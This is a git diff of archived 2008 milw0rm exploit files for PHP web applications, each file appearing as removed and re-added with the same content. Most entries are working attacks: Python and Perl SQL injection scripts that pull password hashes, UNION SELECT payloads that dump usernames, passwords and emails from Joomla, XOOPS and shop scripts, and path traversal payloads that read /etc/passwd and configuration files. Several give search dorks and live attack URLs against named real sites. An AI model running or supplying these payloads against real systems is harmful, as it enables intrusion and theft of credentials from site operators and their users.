str(MD5Count + 1) + ",1))="+ str(Res[ResCount])).read() - - print "[+] Character " + str(MD5Count + 1) + " found! 
" + str(Res[ResCount]) - MD5[MD5Count] = Res[ResCount] - break - except(urllib2.URLError): - continue - except(urllib2.HTTPError): - print "[+] Error: Can't load the Site" - sys.exit(1) - - -for i in MD5: - Hash = Hash + str(chr(i)) - -print "\n[+] Hash: " + Hash - -# milw0rm.com [2008-10-20] +import sys, urllib2, re + +print "\n " +print " \\#'#/ " +print " (-.-) " +print " -------------------oOO---(_)---OOo--------------------" +print " | rGallery 1.09 (+-) Exploit by Five-Three-Nine |" +print " | Using Blind SQL Injection in 'itemID' of rGallery |" +print " | |" +print " | Greets and Shouts to: |" +print " | tmh, n00bor, activebeta, Ghost, Saufkumpel, Altair |" +print " | crusader727, Nemo, Loader007, J0hn.X3r, sNiper109 |" +print " ------------------------------------------------------\n" + + +if len(sys.argv) != 5: + print "\nUsage: ./rGallery.py " + print "Ex: ./rGallery.py 1 bb1_users 19 http://example.com\n" + sys.exit(1) + +UserID = sys.argv[1] +Prefix = sys.argv[2] +ImageID = sys.argv[3] +Host = sys.argv[4] + +Res = [48,49, 50, 51, 52, 53, 54, 55, 56, 57, 97, 98, 99, 100, 101, 102] +MD5 = [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32] +Hash = "" + +UserID = int(UserID) +UserID -= 1 +UserID = str(UserID) + +for MD5Count in range(32): + for ResCount in range(16): + try: + source = urllib2.urlopen(Host +"/index.php?page=RGalleryImageWrapper&itemID=" + ImageID +"%20and%20ascii(substring((SELECT%20password%20from%20" + Prefix +"%20limit%20"+ UserID + ",1)," + str(MD5Count + 1) + ",1))="+ str(Res[ResCount])).read() + + print "[+] Character " + str(MD5Count + 1) + " found! " + str(Res[ResCount]) + MD5[MD5Count] = Res[ResCount] + break + except(urllib2.URLError): + continue + except(urllib2.HTTPError): + print "[+] Error: Can't load the Site" + sys.exit(1) + + +for i in MD5: + Hash = Hash + str(chr(i)) + +print "\n[+] Hash: " + Hash + +# milw0rm.com [2008-10-20] 
diff --git a/platforms/php/webapps/6792.txt b/platforms/php/webapps/6792.txt
index c051f36d4..88244afea 100755
--- a/platforms/php/webapps/6792.txt
+++ b/platforms/php/webapps/6792.txt
@@ -1,37 +1,37 @@ -############################################# -#Joomla com_ds-syndicate Sql-injetion vulnerability # -############################################# -#[~] Author : boom3rang -#[~] HomePage: www.khg-crew.ws -#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er. -#[~] Kosova Hackers Group - -#[!] Component_Name: ds-syndicate -#[!] Script_Name: Joomla -#[!] Google_Dork: inurl:"com_ds-syndicate" -############################################# - - -#[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit] - -#[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users-- - -#[~] Exploit [2]: - 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- - -#[!] Note: -If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;). - -#[~] liveDemo: -http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users-- - -ps. here in this liveDemo you need to download file =feed1= . - -############################################# -#[!] Proud 2 be Albanian -#[!] Proud 2 be Muslim -#[!] United States of Albania -############################################# - - -# milw0rm.com [2008-10-20] +############################################# +#Joomla com_ds-syndicate Sql-injetion vulnerability # +############################################# +#[~] Author : boom3rang +#[~] HomePage: www.khg-crew.ws +#[~] Greetz : H!tm@N, KHG, chs, redc00de, pr0xy-ki11er. +#[~] Kosova Hackers Group + +#[!] Component_Name: ds-syndicate +#[!] Script_Name: Joomla +#[!] 
Google_Dork: inurl:"com_ds-syndicate" +############################################# + + +#[~] Exp: http://localhost/Path/index2.php?option=ds-syndicate&version=1&feed_id=[Exploit] + +#[~] Exploit [1]: 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+jos_users-- + +#[~] Exploit [2]: + 1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+jos_users-- + +#[!] Note: +If you get some file to download like feed or xml, download that file and open with some text editor to see informations like username and password, but first try exploits whithout downloding the file ;). + +#[~] liveDemo: +http://www.esss.se/sv/index2.php?option=ds-syndicate&version=1&feed_id=1+union+all+select+1,concat(username,char(58),password,char(58),email),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20+from+jos_users-- + +ps. here in this liveDemo you need to download file =feed1= . + +############################################# +#[!] Proud 2 be Albanian +#[!] Proud 2 be Muslim +#[!] United States of Albania +############################################# + + +# milw0rm.com [2008-10-20] diff --git a/platforms/php/webapps/6795.txt b/platforms/php/webapps/6795.txt index 0cb870bde..72250238a 100755 --- a/platforms/php/webapps/6795.txt +++ b/platforms/php/webapps/6795.txt 
@@ -1,24 +1,24 @@
-##########################################
-#
-# XOOPS Module: makale
-#
-#
-##########################################
-#
-##AUTHOR : EcHoLL
-####HOME : http://www.warezturk.org
-#
-####MAİL : echoll1983@hotmail.com
-#
-###########################################
-#
-# DORKS 1 : dork: /modules/makale/
-###########################################
-
-target: scriptpage.com/modules/makale/makale.php?id= [sql Code]
-
-Sql code: 15+UNION+SELECT+0,1,2,3,uname,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19+from+xoops_users--
-
-live link: http://stu.inonu.edu.tr/~usit/modules/makale/makale.php?id=10+UNION+SELECT+0,1,2,3,database(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19--
-
-# milw0rm.com [2008-10-20]
+##########################################
+#
+# XOOPS Module: makale
+#
+#
+##########################################
+#
+##AUTHOR : EcHoLL
+####HOME : http://www.warezturk.org
+#
+####MAİL : echoll1983@hotmail.com
+#
+###########################################
+#
+# DORKS 1 : dork: /modules/makale/
+###########################################
+
+target: scriptpage.com/modules/makale/makale.php?id= [sql Code]
+
+Sql code: 15+UNION+SELECT+0,1,2,3,uname,5,pass,7,8,9,10,11,12,13,14,15,16,17,18,19+from+xoops_users--
+
+live link: http://stu.inonu.edu.tr/~usit/modules/makale/makale.php?id=10+UNION+SELECT+0,1,2,3,database(),5,user(),7,8,9,10,11,12,13,14,15,16,17,18,19--
+
+# milw0rm.com [2008-10-20]
diff --git a/platforms/php/webapps/6796.txt b/platforms/php/webapps/6796.txt
index a624b4374..12de6fcf6 100755
--- a/platforms/php/webapps/6796.txt
+++ b/platforms/php/webapps/6796.txt
@@ -1,28 +1,28 @@ -/* - - Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability - -------------------------------------------------------------------------- - StAkeR[at]hotmail[dot]it - http://www.limboportal.com/index.php/option/downloads/task/download/id/108 - -------------------------------------------------------------------------- - - com_privmsg/open.php - - 31. if (isset($_GET['status'])) - 32. { - 33. header('Location:index.php?option=pms&page=open&id='.$_GET['id'].''); - 34. } - 35. - 36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'"); - 37. - - - - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/* - - (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) - - - -*/ - -# milw0rm.com [2008-10-21] +/* + + Limbo CMS (Private Messaging Component) Remote SQL Injection Vulnerability + -------------------------------------------------------------------------- + StAkeR[at]hotmail[dot]it + http://www.limboportal.com/index.php/option/downloads/task/download/id/108 + -------------------------------------------------------------------------- + + com_privmsg/open.php + + 31. if (isset($_GET['status'])) + 32. { + 33. header('Location:index.php?option=pms&page=open&id='.$_GET['id'].''); + 34. } + 35. + 36. $openrow= $conn->GetRow("SELECT * FROM #__pms WHERE id='$_GET[id]' AND username='$my->username'"); + 37. + + + - index.php?option=pms&page=open&id='1+union+all+select+password,username+from+[prefix_users]+where+id=1/* + + (Syntax Error) Change number of columns (Ex: 0,0,0,username,password) + + + +*/ + +# milw0rm.com [2008-10-21] diff --git a/platforms/php/webapps/6797.txt b/platforms/php/webapps/6797.txt index cdaa77f8d..0cecc7633 100755 --- a/platforms/php/webapps/6797.txt +++ b/platforms/php/webapps/6797.txt 
@@ -1,53 +1,53 @@ -# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies -# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php -# -# Author: JosS -# mail: sys-project[at]hotmail[dot]com -# site: http://spanish-hackers.com -# team: Spanish Hackers Team - [SHT] -# -# This was written for educational purpose. Use it at your own risk. -# Author will be not responsible for any damage. - -vuln file: view_member.php -vuln code: -8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){ -x: ... -24: include("./accounts/{$username_get}.php"); -39: } - -PoC: GET view_member.php?username=[file]%00 -ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00 - ---- - -vuln file: login.php -vuln code: -18: include("./accounts/".$_POST['username_post'].".php"); - -PoC: POST login.php?username_post=[file]%00 -ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00 - ---- - -vuln file: check_user.php -vuln code: -6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){ - - $username_cookie = $_COOKIE['Lightblog_username']; - $password_cookie = $_COOKIE['Lightblog_password']; - - if(file_exists("./accounts/{$username_cookie}.php")){ -13:include("./accounts/{$username_cookie}.php"); - -PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS; - path=/"; -ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/"; - document.cookie = "Lightblog_password=JosS; path=/"; - ---- - -and more ... 
-hack0wn :D - -# milw0rm.com [2008-10-21] +# LightBlog 9.8 (GET,POST,COOKIE) Multiple Local File Inclusion Vulnerabilies +# url: http://www.publicwarehouse.co.uk/php_scripts/lightblog.php +# +# Author: JosS +# mail: sys-project[at]hotmail[dot]com +# site: http://spanish-hackers.com +# team: Spanish Hackers Team - [SHT] +# +# This was written for educational purpose. Use it at your own risk. +# Author will be not responsible for any damage. + +vuln file: view_member.php +vuln code: +8: if(isset($_GET['username']) and file_exists("./accounts/".$_GET['username'].".php")){ +x: ... +24: include("./accounts/{$username_get}.php"); +39: } + +PoC: GET view_member.php?username=[file]%00 +ExP: GET view_member.php?username=../../../../../../../../../../etc/passwd%00 + +--- + +vuln file: login.php +vuln code: +18: include("./accounts/".$_POST['username_post'].".php"); + +PoC: POST login.php?username_post=[file]%00 +ExP: POST login.php?username_post=../../../../../../../../../../etc/passwd%00 + +--- + +vuln file: check_user.php +vuln code: +6: if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){ + + $username_cookie = $_COOKIE['Lightblog_username']; + $password_cookie = $_COOKIE['Lightblog_password']; + + if(file_exists("./accounts/{$username_cookie}.php")){ +13:include("./accounts/{$username_cookie}.php"); + +PoC: javascript:document.cookie = "Lightblog_username=[file]%00; path=/"; document.cookie = "Lightblog_password=JosS; + path=/"; +ExP: javascript:document.cookie = "Lightblog_username=../../../../../../../../../../etc/passwd%00; path=/"; + document.cookie = "Lightblog_password=JosS; path=/"; + +--- + +and more ... +hack0wn :D + +# milw0rm.com [2008-10-21] diff --git a/platforms/php/webapps/6799.txt b/platforms/php/webapps/6799.txt index 8b4f1afd3..69ac56dc2 100755 --- a/platforms/php/webapps/6799.txt +++ b/platforms/php/webapps/6799.txt 
@@ -1,48 +1,48 @@ -|___________________________________________________| -| -| ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| | -| -| script : http://shop.maker.ir -| -| DorK : "ShopMaker v1.0" -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin-- - - -DemO : - - -http://shop.maker.ir/shop/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin-- - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-10-21] +|___________________________________________________| +| +| ShopMaker v1.0 (product.php id) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| | +| +| script : http://shop.maker.ir +| +| DorK : "ShopMaker v1.0" +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin-- + + +DemO : + + +http://shop.maker.ir/shop/product.php?id=-54+union+select+1,concat(email,0x3e,password),3,4+from+admin-- + + +____________________________( 
Greetz )_________________________________
+|
+| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC |
+|
+| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr
+|
+| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab
+|_____________________________________________________________________
+
+
+ Im IRAQi | Im TrYaGi
+
+# milw0rm.com [2008-10-21]
diff --git a/platforms/php/webapps/6802.txt b/platforms/php/webapps/6802.txt
index c03518682..30cf2df25 100755
--- a/platforms/php/webapps/6802.txt
+++ b/platforms/php/webapps/6802.txt
@@ -1,45 +1,45 @@ -############################################################################# -# # -# Joomla Component Daily Message (id) SQL Injection Vulnerability # -# # -############################################################################# - - -######################################## - -[~] Vulnerability found by: H!tm@N -[~] Contact: hitman[at]khg-crew[dot]ws -[~] Site: www.khg-crew.ws -[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-] - -######################################## - -[~] ScriptName: "Joomla" -[~] Component: "Daily Message (com_dailymessage)" -[~] Version: "1.0.3 " -[~] Date: "10/4/2005 " -[~] Author: "Joseph LeBlanc" -[~] Author E-mail: "contact@jlleblanc.com" -[~] Author URL: "www.jlleblanc.com" - -######################################## - -[~] Exploit: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=[SQL] - -[~] Example: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users-- - -######################################## - -[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=faq&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users-- - -[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=drivers&id=-7+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users-- - -######################################## - -[~] Proud 2 be Albanian -[~] Proud 2 be Muslim -[~] United States of Albania - -######################################## - -# milw0rm.com [2008-10-22] +############################################################################# +# # +# Joomla Component Daily Message (id) SQL Injection Vulnerability # +# # +############################################################################# + + +######################################## + +[~] Vulnerability found by: H!tm@N +[~] Contact: 
hitman[at]khg-crew[dot]ws
+[~] Site: www.khg-crew.ws
+[~] Greetz: boom3rang, KHG, urtan, war_ning, chs, redc00de - [-=Kosova Hackers Group=-]
+
+########################################
+
+[~] ScriptName: "Joomla"
+[~] Component: "Daily Message (com_dailymessage)"
+[~] Version: "1.0.3 "
+[~] Date: "10/4/2005 "
+[~] Author: "Joseph LeBlanc"
+[~] Author E-mail: "contact@jlleblanc.com"
+[~] Author URL: "www.jlleblanc.com"
+
+########################################
+
+[~] Exploit: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=[SQL]
+
+[~] Example: /index.php?option=com_dailymessage&Itemid=31&page=[PAGENAME]&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
+
+########################################
+
+[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=faq&id=-7+union+select+concat(username,char(58),password)KHG,2,3+from+jos_users--
+
+[~] Live Demo: http://www.drakbutiken.se/index.php?option=com_dailymessage&Itemid=31&page=drivers&id=-7+union+select+1,concat(username,char(58),password)KHG,3+from+jos_users--
+
+########################################
+
+[~] Proud 2 be Albanian
+[~] Proud 2 be Muslim
+[~] United States of Albania
+
+########################################
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6803.txt b/platforms/php/webapps/6803.txt
index 67a99802f..9c49711c7 100755
--- a/platforms/php/webapps/6803.txt
+++ b/platforms/php/webapps/6803.txt
@@ -1,18 +1,18 @@
-Found by: X0r
-Iamma Simple Gallery Arbitrary File Upload
-Version: 1,2 (?)
-Email: evolutionteam.x0[at]gmail[dot]com
-Script
-Download:http://www.matteoiammarrone.com/public/modules.php?name=Downloads&d_op=getit&lid=4
-
-Script Download
-2:http://www.pierotofy.it/pages/download.php?filename=100p97q116r97s47t112a114i111f103g114h97n109o115l47m80b72c80d47e105u115v103z50p46q122r105s112t
-
-Bug: There isn't any check for file extensions.
-
-Exploit: http://[site]/[path]/upload.php
-
-
-// X0r - EvolutionTeaM
-
-# milw0rm.com [2008-10-22]
+Found by: X0r
+Iamma Simple Gallery Arbitrary File Upload
+Version: 1,2 (?)
+Email: evolutionteam.x0[at]gmail[dot]com
+Script
+Download:http://www.matteoiammarrone.com/public/modules.php?name=Downloads&d_op=getit&lid=4
+
+Script Download
+2:http://www.pierotofy.it/pages/download.php?filename=100p97q116r97s47t112a114i111f103g114h97n109o115l47m80b72c80d47e105u115v103z50p46q122r105s112t
+
+Bug: There isn't any check for file extensions.
+
+Exploit: http://[site]/[path]/upload.php
+
+
+// X0r - EvolutionTeaM
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6806.txt b/platforms/php/webapps/6806.txt
index b8aece28d..2660aa07f 100755
--- a/platforms/php/webapps/6806.txt
+++ b/platforms/php/webapps/6806.txt
@@ -1,33 +1,33 @@ --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- -phpcrs <= 2.06 / Local File Inclusion Vulnerability --=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- - -$ Program: phpcrs -$ Version: <= 2.06 -$ File affected: frame.php -$ Download: http://sourceforge.net/projects/phpcrs/ - - -Found by Pepelux -eNYe-Sec - www.enye-sec.org - - ---Bug -- - -151. elseif( isset( $btnStartImport ) ) { -152. require("../inc/frmDoImport.inc.php"); -153. require("../inc/". $importFunction .".inc.php"); -154. require("../inc/inc/getFunctions.inc.php"); -155. $importFunction(); -156. frmDoImport( $selectedImport ); -157. } - - --- Exploit -- - -http://site.com/frame.php?btnStartImport=xxx&importFunction=../../../../../etc/passwd%00 - -NOTE: website only works with Firefox. To navigate you must use Firefox and to exploit -it, you only have to change the user-agent. - -# milw0rm.com [2008-10-22] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +phpcrs <= 2.06 / Local File Inclusion Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +$ Program: phpcrs +$ Version: <= 2.06 +$ File affected: frame.php +$ Download: http://sourceforge.net/projects/phpcrs/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + + +--Bug -- + +151. elseif( isset( $btnStartImport ) ) { +152. require("../inc/frmDoImport.inc.php"); +153. require("../inc/". $importFunction .".inc.php"); +154. require("../inc/inc/getFunctions.inc.php"); +155. $importFunction(); +156. frmDoImport( $selectedImport ); +157. } + + +-- Exploit -- + +http://site.com/frame.php?btnStartImport=xxx&importFunction=../../../../../etc/passwd%00 + +NOTE: website only works with Firefox. To navigate you must use Firefox and to exploit +it, you only have to change the user-agent. + +# milw0rm.com [2008-10-22] diff --git a/platforms/php/webapps/6808.pl b/platforms/php/webapps/6808.pl index ee68d893c..3a25235d8 100755 --- a/platforms/php/webapps/6808.pl +++ b/platforms/php/webapps/6808.pl 
@@ -1,30 +1,30 @@
-#!/usr/bin/perl
-# This Exploit requires a valid user name and password of an account regardless of the permissions
-#
-# Author: Xianur0
-# Affected: All Versions
-# Bug: SQL Injection
-#
-# Doorks:
-# allintext: "powered by LoudBlog"
-
-
- use HTTP::Request::Common qw(POST);
- use LWP::UserAgent;
- use Digest::MD5 qw(md5_hex);
- $ua = LWP::UserAgent->new;
-
-print "\n LoudBlog Exploit All Version By Xianur0\n\n";
-$uri = $ARGV[0];
-$id = $ARGV[1];
-$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
-$md5 = md5_hex($ARGV[2]).":".md5_hex($password);
-
- my $req = POST $uri.'/loudblog/ajax.php',
- [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
-$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
-$req->header('Cookie' => 'lbauth='.$md5);
-$res = $ua->request($req);
- print $res->content."\n";
-
-# milw0rm.com [2008-10-22]
+#!/usr/bin/perl
+# This Exploit requires a valid user name and password of an account regardless of the permissions
+#
+# Author: Xianur0
+# Affected: All Versions
+# Bug: SQL Injection
+#
+# Doorks:
+# allintext: "powered by LoudBlog"
+
+
+ use HTTP::Request::Common qw(POST);
+ use LWP::UserAgent;
+ use Digest::MD5 qw(md5_hex);
+ $ua = LWP::UserAgent->new;
+
+print "\n LoudBlog Exploit All Version By Xianur0\n\n";
+$uri = $ARGV[0];
+$id = $ARGV[1];
+$password = $ARGV[3] || die("\nUse: loudblog.pl [URI] [ID Admin] [Valid User] [Valid Password]\n");
+$md5 = md5_hex($ARGV[2]).":".md5_hex($password);
+
+ my $req = POST $uri.'/loudblog/ajax.php',
+ [ colpick => "concat(0x557365723a20,nickname,0x0d0a50617373776f72643a20,password)", rowpick => "id", rowval => $id, table => 'authors', action => 'singleread'];
+$req->header('User-Agent' => 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17');
+$req->header('Cookie' => 'lbauth='.$md5);
+$res = $ua->request($req);
+ print $res->content."\n";
+
+# milw0rm.com [2008-10-22]
diff --git a/platforms/php/webapps/6809.txt b/platforms/php/webapps/6809.txt
index a881a7220..3074f216d 100755
--- a/platforms/php/webapps/6809.txt
+++ b/platforms/php/webapps/6809.txt
@@ -1,40 +1,40 @@ -[o]------------------------------------------------------------------------------------[x] - | Arbitrary File Download Vulnerability | -[o]------------------------------------------------------------------------------------[o] - | Software : ionFiles 4.4.2 Component for Joomla! CMS | - | Vendor : http://forum.codecall.net/ | - | Date : 23 October 2008 | - | Author : Vrs-hCk | - | Contact : d00r[at]telkom[dot]net | -[o]------------------------------------------------------------------------------------[o] - -[»] Google Dork - - inurl:com_ionfiles - -[»] Vulnerable - - ./download.php - - Line 32: $file = $_GET['file']; - Line 33: $download = $_GET['download']; - Line 66 - 91 - -[»] Exploit - - http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1 - -[»] Proof of Concept - - http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1 - http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 - -[o]------------------------------------------------------------------------------------[x] - | Greetz | -[o]------------------------------------------------------------------------------------[o] - | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | - | Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius, | - | Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :)) | -[o]------------------------------------------------------------------------------------[o] - -# milw0rm.com [2008-10-22] +[o]------------------------------------------------------------------------------------[x] + | Arbitrary File Download Vulnerability | +[o]------------------------------------------------------------------------------------[o] + | Software : ionFiles 4.4.2 Component for Joomla! 
CMS | + | Vendor : http://forum.codecall.net/ | + | Date : 23 October 2008 | + | Author : Vrs-hCk | + | Contact : d00r[at]telkom[dot]net | +[o]------------------------------------------------------------------------------------[o] + +[»] Google Dork + + inurl:com_ionfiles + +[»] Vulnerable + + ./download.php + + Line 32: $file = $_GET['file']; + Line 33: $download = $_GET['download']; + Line 66 - 91 + +[»] Exploit + + http://[site]/[path]/com_ionfiles/download.php?file=[path_file]&download=1 + +[»] Proof of Concept + + http://esecutech.com/components/com_ionfiles/download.php?file=../../configuration.php&download=1 + http://esecutech.com/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1 + +[o]------------------------------------------------------------------------------------[x] + | Greetz | +[o]------------------------------------------------------------------------------------[o] + | All Member oF MainHack BrotherHood - www.MainHack.com - www.ServerIsDown.org | + | Jack, Darmawan, Mario, Zeth, Angela Chang, Janroe, Lukman, Didy, Anthonius, | + | Daus, Rijal, Andrei, Toyong, dkk ... Indonesia Banget xixixix ... :)) | +[o]------------------------------------------------------------------------------------[o] + +# milw0rm.com [2008-10-22] diff --git a/platforms/php/webapps/6811.txt b/platforms/php/webapps/6811.txt index a54c9083e..7170ecf58 100755 --- a/platforms/php/webapps/6811.txt +++ b/platforms/php/webapps/6811.txt 
@@ -1,48 +1,48 @@ -|___________________________________________________| -| -| YDC ( cat) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|-------------------- Hussin X -------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -|___________________________________________________ -| | -| -| script : http://www.ydc.ir/ -| -| DorK : "Powered by YDC" -|___________________________________________________| - -Exploit: -________ - - - -www.[target].com/Script/klist.php?cat=-0+union+select+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0+FROM+iadmin-- - -or - -klist.php?cat=-0+uNioN+sELeCT+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0,0,0+FROM+iadmin-- - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab -|_____________________________________________________________________ - - - Im IRAQi | Im TrYaGi - -# milw0rm.com [2008-10-22] +|___________________________________________________| +| +| YDC ( cat) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|-------------------- Hussin X -------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +|___________________________________________________ +| | +| +| script : http://www.ydc.ir/ +| +| DorK : "Powered by YDC" +|___________________________________________________| + +Exploit: +________ + + + +www.[target].com/Script/klist.php?cat=-0+union+select+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0+FROM+iadmin-- + +or + +klist.php?cat=-0+uNioN+sELeCT+0,concat(user,0x3e,pass),0,0,0,0,0,0,0,0,0,0,0,0+FROM+iadmin-- + + + + +____________________________( Greetz )_________________________________ +| +| All 
members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone | Sakab +|_____________________________________________________________________ + + + Im IRAQi | Im TrYaGi + +# milw0rm.com [2008-10-22] diff --git a/platforms/php/webapps/6814.php b/platforms/php/webapps/6814.php index 934fafaef..fe898660c 100755 --- a/platforms/php/webapps/6814.php +++ b/platforms/php/webapps/6814.php @@ -1,47 +1,47 @@ - -eNYe-Sec - www.enye-sec.org - - ---Bug -- - -4. if (!$language)$language="ch"; -5. include_once("../lib/lang.".$language.".php"); - - - --- Exploit -- - -http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00 - -# milw0rm.com [2008-10-23] +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- +txtshop - beta 1.0 / Local File Inclusion Vulnerability +-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- + +$ Program: txtshop +$ Version: <= 1.0 +$ File affected: ADMIN/header.php +$ Download: http://sourceforge.net/projects/txtshop/ + + +Found by Pepelux +eNYe-Sec - www.enye-sec.org + + +--Bug -- + +4. if (!$language)$language="ch"; +5. include_once("../lib/lang.".$language.".php"); + + + +-- Exploit -- + +http://site.com/ADMIN/header.php?language=/../../../../../etc/passwd%00 + +# milw0rm.com [2008-10-23] diff --git a/platforms/php/webapps/6817.txt b/platforms/php/webapps/6817.txt index 026a99b2c..4765eab13 100755 --- a/platforms/php/webapps/6817.txt +++ b/platforms/php/webapps/6817.txt 
